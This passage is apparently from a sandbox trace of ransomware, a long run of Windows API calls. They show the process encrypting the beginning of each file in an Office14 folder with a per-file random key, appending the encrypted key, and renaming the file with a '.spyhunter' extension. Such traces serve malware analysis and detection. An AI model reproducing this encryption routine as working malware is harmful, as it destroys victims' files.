() returned 0x2c0000 [0110.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfa3a8 | out: hHeap=0x2c0000) returned 1 [0110.954] GetProcessHeap () returned 0x2c0000 [0110.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0110.954] GetProcessHeap () returned 0x2c0000 [0110.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x331c40 | out: hHeap=0x2c0000) returned 1 [0110.954] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfad0 | out: pbBuffer=0x25cfad0) returned 1 [0110.954] GetProcessHeap () returned 0x2c0000 [0110.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0110.954] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfac8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfac8*=0x30) returned 1 [0110.954] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ONBttnPPT.dll" (normalized: "c:\\program files\\microsoft office\\office14\\onbttnppt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0110.955] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ONBttnPPT.dll") returned 60 [0110.955] StrStrW (lpFirst="ONBttnPPT.dll", lpSrch=".txt") returned 0x0 [0110.955] GetProcessHeap () returned 0x2c0000 [0110.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0110.955] ReadFile (in: hFile=0x154, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfa8c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cfa8c*=0x2800, lpOverlapped=0x0) returned 1 [0110.975] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0110.975] WriteFile (in: hFile=0x154, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfa8c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cfa8c*=0x2800, lpOverlapped=0x0) returned 1 [0110.975] GetProcessHeap () returned 0x2c0000 [0110.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0110.975] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0110.975] WriteFile (in: hFile=0x154, lpBuffer=0x25cfacc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfa8c, lpOverlapped=0x0 | out: lpBuffer=0x25cfacc*, lpNumberOfBytesWritten=0x25cfa8c*=0x4, lpOverlapped=0x0) returned 1 [0111.008] WriteFile (in: hFile=0x154, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfa8c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfa8c*=0x30, lpOverlapped=0x0) returned 1 [0111.008] CloseHandle (hObject=0x154) returned 1 [0111.012] GetProcessHeap () returned 0x2c0000 [0111.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cfa3a8 [0111.012] wnsprintfW (in: pszDest=0x2cfa3a8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ONBttnPPT.dll.spyhunter") returned 70 [0111.012] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ONBttnPPT.dll" (normalized: "c:\\program files\\microsoft office\\office14\\onbttnppt.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ONBttnPPT.dll.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\onbttnppt.dll.spyhunter")) returned 1 [0111.014] GetProcessHeap () returned 0x2c0000 [0111.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfa3a8 | out: hHeap=0x2c0000) returned 1 [0111.014] GetProcessHeap () returned 0x2c0000 [0111.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0111.014] GetProcessHeap () returned 0x2c0000 [0111.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ded628 | out: hHeap=0x2c0000) returned 1 [0111.014] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfac8 | out: pbBuffer=0x25cfac8) returned 1 [0111.014] GetProcessHeap () returned 0x2c0000 [0111.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0111.014] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfac0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfac0*=0x30) returned 1 [0111.014] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OUTLVBS.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\outlvbs.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0111.015] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OUTLVBS.DLL") returned 58 [0111.015] StrStrW (lpFirst="OUTLVBS.DLL", lpSrch=".txt") returned 0x0 [0111.015] GetProcessHeap () returned 0x2c0000 [0111.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0111.015] ReadFile (in: hFile=0x154, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfa84, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cfa84*=0x2800, lpOverlapped=0x0) returned 1 [0111.017] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.017] WriteFile (in: hFile=0x154, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfa84, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cfa84*=0x2800, lpOverlapped=0x0) returned 1 [0111.017] GetProcessHeap () returned 0x2c0000 [0111.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0111.017] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.017] WriteFile (in: hFile=0x154, lpBuffer=0x25cfac4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfa84, lpOverlapped=0x0 | out: lpBuffer=0x25cfac4*, lpNumberOfBytesWritten=0x25cfa84*=0x4, lpOverlapped=0x0) returned 1 [0111.062] WriteFile (in: hFile=0x154, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfa84, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfa84*=0x30, lpOverlapped=0x0) returned 1 [0111.062] CloseHandle (hObject=0x154) returned 1 [0111.062] GetProcessHeap () returned 0x2c0000 [0111.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cfa3a8 [0111.062] wnsprintfW (in: pszDest=0x2cfa3a8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OUTLVBS.DLL.spyhunter") returned 68 [0111.063] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OUTLVBS.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\outlvbs.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OUTLVBS.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\outlvbs.dll.spyhunter")) returned 1 [0111.063] GetProcessHeap () returned 0x2c0000 [0111.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfa3a8 | out: hHeap=0x2c0000) returned 1 [0111.063] GetProcessHeap () returned 0x2c0000 [0111.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0111.063] GetProcessHeap () returned 0x2c0000 [0111.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2eae0 | out: hHeap=0x2c0000) returned 1 [0111.064] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfac0 | out: pbBuffer=0x25cfac0) returned 1 [0111.064] GetProcessHeap () returned 0x2c0000 [0111.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0111.065] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfab8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfab8*=0x30) returned 1 [0111.065] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.PL.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.pl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0111.081] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.PL.XML") returned 79 [0111.081] StrStrW (lpFirst="YAHOO.PL.XML", lpSrch=".txt") returned 0x0 [0111.081] GetProcessHeap () returned 0x2c0000 [0111.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0111.082] ReadFile (in: hFile=0x154, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfa7c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cfa7c*=0x326, lpOverlapped=0x0) returned 1 [0111.275] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffcda, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.275] WriteFile (in: hFile=0x154, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x326, lpNumberOfBytesWritten=0x25cfa7c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cfa7c*=0x326, lpOverlapped=0x0) returned 1 [0111.276] GetProcessHeap () returned 0x2c0000 [0111.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0111.276] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.276] WriteFile (in: hFile=0x154, lpBuffer=0x25cfabc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfa7c, lpOverlapped=0x0 | out: lpBuffer=0x25cfabc*, lpNumberOfBytesWritten=0x25cfa7c*=0x4, lpOverlapped=0x0) returned 1 [0111.276] WriteFile (in: hFile=0x154, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfa7c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfa7c*=0x30, lpOverlapped=0x0) returned 1 [0111.276] CloseHandle (hObject=0x154) returned 1 [0111.276] GetProcessHeap () returned 0x2c0000 [0111.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cfa3a8 [0111.276] wnsprintfW (in: pszDest=0x2cfa3a8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.PL.XML.spyhunter") returned 89 [0111.276] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.PL.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.pl.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.PL.XML.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.pl.xml.spyhunter")) returned 1 [0111.277] GetProcessHeap () returned 0x2c0000 [0111.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfa3a8 | out: hHeap=0x2c0000) returned 1 [0111.277] GetProcessHeap () returned 0x2c0000 [0111.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0111.277] GetProcessHeap () returned 0x2c0000 [0111.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce97c8 | out: hHeap=0x2c0000) returned 1 [0111.277] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfac0 | out: pbBuffer=0x25cfac0) returned 1 [0111.277] GetProcessHeap () returned 0x2c0000 [0111.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0111.277] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfab8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfab8*=0x30) returned 1 [0111.277] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.NO.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.no.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0111.278] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.NO.XML") returned 79 [0111.278] StrStrW (lpFirst="YAHOO.NO.XML", lpSrch=".txt") returned 0x0 [0111.278] GetProcessHeap () returned 0x2c0000 [0111.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0111.278] ReadFile (in: hFile=0x154, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfa7c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cfa7c*=0x326, lpOverlapped=0x0) returned 1 [0111.296] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffcda, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.296] WriteFile (in: hFile=0x154, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x326, lpNumberOfBytesWritten=0x25cfa7c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cfa7c*=0x326, lpOverlapped=0x0) returned 1 [0111.296] GetProcessHeap () returned 0x2c0000 [0111.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0111.296] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.296] WriteFile (in: hFile=0x154, lpBuffer=0x25cfabc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfa7c, lpOverlapped=0x0 | out: lpBuffer=0x25cfabc*, lpNumberOfBytesWritten=0x25cfa7c*=0x4, lpOverlapped=0x0) returned 1 [0111.297] WriteFile (in: hFile=0x154, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfa7c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfa7c*=0x30, lpOverlapped=0x0) returned 1 [0111.297] CloseHandle (hObject=0x154) returned 1 [0111.297] GetProcessHeap () returned 0x2c0000 [0111.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cfa3a8 [0111.297] wnsprintfW (in: pszDest=0x2cfa3a8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.NO.XML.spyhunter") returned 89 [0111.297] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.NO.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.no.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.NO.XML.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.no.xml.spyhunter")) returned 1 [0111.298] GetProcessHeap () returned 0x2c0000 [0111.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfa3a8 | out: hHeap=0x2c0000) returned 1 [0111.298] GetProcessHeap () returned 0x2c0000 [0111.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0111.298] GetProcessHeap () returned 0x2c0000 [0111.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce96e0 | out: hHeap=0x2c0000) returned 1 [0111.298] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfab8 | out: pbBuffer=0x25cfab8) returned 1 [0111.298] GetProcessHeap () returned 0x2c0000 [0111.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0111.299] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfab0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfab0*=0x30) returned 1 [0111.299] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.JP.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.jp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0111.315] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.JP.XML") returned 79 [0111.315] StrStrW (lpFirst="YAHOO.JP.XML", lpSrch=".txt") returned 0x0 [0111.315] GetProcessHeap () returned 0x2c0000 [0111.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0111.315] ReadFile (in: hFile=0x154, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfa74, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cfa74*=0x331, lpOverlapped=0x0) returned 1 [0111.330] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffccf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.330] WriteFile (in: hFile=0x154, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x331, lpNumberOfBytesWritten=0x25cfa74, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cfa74*=0x331, lpOverlapped=0x0) returned 1 [0111.331] GetProcessHeap () returned 0x2c0000 [0111.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0111.331] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.331] WriteFile (in: hFile=0x154, lpBuffer=0x25cfab4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfa74, lpOverlapped=0x0 | out: lpBuffer=0x25cfab4*, lpNumberOfBytesWritten=0x25cfa74*=0x4, lpOverlapped=0x0) returned 1 [0111.331] WriteFile (in: hFile=0x154, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfa74, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfa74*=0x30, lpOverlapped=0x0) returned 1 [0111.331] CloseHandle (hObject=0x154) returned 1 [0111.331] GetProcessHeap () returned 0x2c0000 [0111.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cfa3a8 [0111.331] wnsprintfW (in: pszDest=0x2cfa3a8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.JP.XML.spyhunter") returned 89 [0111.331] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.JP.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.jp.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.JP.XML.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.jp.xml.spyhunter")) returned 1 [0111.332] GetProcessHeap () returned 0x2c0000 [0111.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfa3a8 | out: hHeap=0x2c0000) returned 1 [0111.332] GetProcessHeap () returned 0x2c0000 [0111.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0111.332] GetProcessHeap () returned 0x2c0000 [0111.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce95f8 | out: hHeap=0x2c0000) returned 1 [0111.332] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfab8 | out: pbBuffer=0x25cfab8) returned 1 [0111.332] GetProcessHeap () returned 0x2c0000 [0111.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0111.332] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfab0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfab0*=0x30) returned 1 [0111.332] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.IT.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.it.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0111.333] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.IT.XML") returned 79 [0111.333] StrStrW (lpFirst="YAHOO.IT.XML", lpSrch=".txt") returned 0x0 [0111.333] GetProcessHeap () returned 0x2c0000 [0111.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0111.333] ReadFile (in: hFile=0x154, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfa74, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cfa74*=0x324, lpOverlapped=0x0) returned 1 [0111.353] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffcdc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.353] WriteFile (in: hFile=0x154, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x324, lpNumberOfBytesWritten=0x25cfa74, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cfa74*=0x324, lpOverlapped=0x0) returned 1 [0111.353] GetProcessHeap () returned 0x2c0000 [0111.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0111.353] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.353] WriteFile (in: hFile=0x154, lpBuffer=0x25cfab4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfa74, lpOverlapped=0x0 | out: lpBuffer=0x25cfab4*, lpNumberOfBytesWritten=0x25cfa74*=0x4, lpOverlapped=0x0) returned 1 [0111.354] WriteFile (in: hFile=0x154, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfa74, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfa74*=0x30, lpOverlapped=0x0) returned 1 [0111.354] CloseHandle (hObject=0x154) returned 1 [0111.354] GetProcessHeap () returned 0x2c0000 [0111.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c7e1b0 [0111.354] wnsprintfW (in: pszDest=0x2c7e1b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.IT.XML.spyhunter") returned 89 [0111.354] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.IT.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.it.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.IT.XML.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.it.xml.spyhunter")) returned 1 [0111.354] GetProcessHeap () returned 0x2c0000 [0111.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7e1b0 | out: hHeap=0x2c0000) returned 1 [0111.355] GetProcessHeap () returned 0x2c0000 [0111.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0111.355] GetProcessHeap () returned 0x2c0000 [0111.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce9510 | out: hHeap=0x2c0000) returned 1 [0111.355] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfab0 | out: pbBuffer=0x25cfab0) returned 1 [0111.355] GetProcessHeap () returned 0x2c0000 [0111.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0111.355] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfaa8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfaa8*=0x30) returned 1 [0111.355] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PE.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\pe.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0111.363] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PE.DLL") returned 53 [0111.363] StrStrW (lpFirst="PE.DLL", lpSrch=".txt") returned 0x0 [0111.363] GetProcessHeap () returned 0x2c0000 [0111.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0111.363] ReadFile (in: 